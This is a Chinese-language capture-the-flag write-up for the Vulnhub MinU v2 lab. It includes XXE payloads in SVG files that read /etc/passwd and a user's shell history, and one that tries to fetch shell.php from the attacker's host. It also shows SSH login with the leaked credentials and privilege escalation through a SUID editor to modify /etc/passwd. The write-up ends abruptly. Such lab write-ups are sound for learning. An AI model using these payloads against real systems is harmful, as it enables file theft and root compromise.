Vulnhub之MinU V2详细测试过程
MinU v2
识别目标主机IP地址
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:10:8b:6f 1 60 PCS Systemtechnik GmbH
192.168.56.246 08:00:27:aa:79:dc 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.246
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MinUv2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.246 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-06 01:52 EDT
Nmap scan report for bogon (192.168.56.246)
Host is up (0.00012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 82:33:25:61:27:97:ea:4a:49:f5:76:a3:33:1c:ae:2b (RSA)
| 256 ed:ca:f6:b9:b5:39:32:89:d0:a3:36:94:82:04:4a:e8 (ECDSA)
|_ 256 26:79:15:2e:be:93:02:41:04:c9:ea:e8:05:16:d1:83 (ED25519)
3306/tcp open mysql?
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain
| Transfer-Encoding: chunked
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 404 Not Found
| X-Powered-By: Kemal
| Content-Type: text/html
| <!DOCTYPE html>
| <html>
| <head>
| <style type="text/css">
| body { text-align:center;font-family:helvetica,arial;font-size:22px;
| color:#888;margin:20px}
| max-width: 579px; width: 100%; }
| {margin:0 auto;width:500px;text-align:left}
| </style>
| </head>
| <body>
| <h2>Kemal doesn't know this way.</h2>
|_ <svg id="svg" version="1.1" width="400" height="400" viewBox="0 0 400 400" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" ><g id="svgg"><path id="path0" d="M262.800 99.200 L 262.800 150.400 265.461 150.400 L 268.121 150.400 267.864 144.300 C 267.722 140.945,267.510 120.110,267.391 98.000 C 267.273 75.890,267.074 55.595,266.948 52.900 L 266.719 48.000 264.760 48.000 L 262.800 48.000 262.800 99.200 M160.800 290.800 C 160.800 291.301,161.224 291.301,162.000
|_sslv2: ERROR: Script execution failed (use -d to debug)
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、3306(注意是HTTP服务)
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MinUv2]
└─$ gobuster dir -u http://192.168.56.246:3306 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.246:3306
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,sh,js,txt
[+] Timeout: 10s
===============================================================
2023/04/06 02:07:42 Starting gobuster in directory enumeration mode
===============================================================
/upload.html (Status: 200) [Size: 908]
Gobuster工具发现了/upload.html文件,可以上传文件
但是只能上传svg格式的图片文件
这里使用svg xxe 注入 漏洞
https://insinuator.net/2015/03/xxe-injection-in-apache-batik-library-cve-2015-0250/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MinUv2]
└─$ vim exploit1.svg
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MinUv2]
└─$ cat exploit1.svg
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
将exploit1.svg通过upload.html上传。
可以得到成功返回:
in:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
chrony:x:100:101:chrony:/var/log/chrony:/sbin/nologin
employee:x:1000:1000:Linux User,,,:/home/employee:/bin/ash
</svg>
Upload OK
└─$ cat exploit2.svg
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///home/employee/.ssh/id_rsa" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
返回错误:
Image.svg:1: parser error : Failure to process entity xxe .w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe; ^ image.svg:1: parser error : Entity 'xxe' not defined .w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe; ^ Upload OK
不存在ssh的私钥文件,再测一下是否有远程文件包含:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MinUv2]
└─$ cat exploit3.svg
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "http://192.168.56.230:8000/test.txt" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
此时可以得到返回:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [
<!ENTITY xxe SYSTEM "http://192.168.56.230:8000/test.txt">
]>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="500px" height="40px" version="1.1">jason,hello
</svg>
Upload OK
接下来的目标是得到Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MinUv2]
└─$ vim exploit4.svg
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MinUv2]
└─$ cat exploit4.svg
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "http://192.168.56.230:8000/shell.php" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
但是没有得到相应的Shell
看来利用远程文件包含漏洞不能成功,看下.bash_history文件
─$ cat exploit6.svg
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///home/employee/.bash_history" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
并没有返回内容,但是需要注意从/etc/passwd文件内容可以知道employee的bash为ash
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MinUv2]
└─$ vim exploit7.svg
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MinUv2]
└─$ cat exploit7.svg
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///home/employee/.ash_history" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
得到返回:
?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [
<!ENTITY xxe SYSTEM "file:///home/employee/.ash_history">
]>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="500px" height="40px" version="1.1">useradd -D bossdonttrackme -p superultrapass3
exit
</svg>
Upload OK
从而知道用户名和密码:
employee: superultrapass3
-D是描述,不是用户名
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MinUv2]
└─$ ssh employee@192.168.56.246
employee@192.168.56.246's password:
_ ____
/\/\ (_)_ __ /\ /\__ _|___ \
/ \| | '_ \/ / \ \ \ / / __) |
/ /\/\ \ | | | \ \_/ /\ V / / __/
\/ \/_|_| |_|\___/ \_/ |_____|
minuv2:~$ id
uid=1000(employee) gid=1000(employee) groups=1000(employee)
minuv2:~$ sudo -l
-ash: sudo: not found
minuv2:~$ ls -alh
total 14M
drwxr-sr-x 4 employee employee 1.0K Apr 6 06:15 .
drwxr-xr-x 3 root root 1.0K Jul 16 2019 ..
-rw------- 1 employee employee 72 Apr 6 06:34 .ash_history
drwxr-sr-x 3 root employee 1.0K Jul 16 2019 .config
-rw-r--r-- 1 employee employee 253 Apr 6 06:31 image.svg
-rwxr-xr-x 1 employee employee 14.3M Jul 16 2019 main-static
-rw-r--r-- 1 employee employee 169 Jul 16 2019 main.pl
-rw-r--r-- 1 employee employee 302 Apr 6 06:31 perl.out
drwxr-sr-x 2 employee employee 1.0K Jul 16 2019 public
提权
minuv2:~$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/micro
/bin/bbsuid
└─$ sudo openssl passwd -salt jason -1 123456
$1$jason$kqq2SnNAGHtj7Joa0Zlp61
注意不能直接用Micro打开/etc/passwd文件,需要用cat命令管道到micro民工
minuv2:~$ cat /etc/passwd | /usr/bin/micro
STRIVE FOR PROGRESS,NOT FOR PERFECTION
浙公网安备 33010602011771号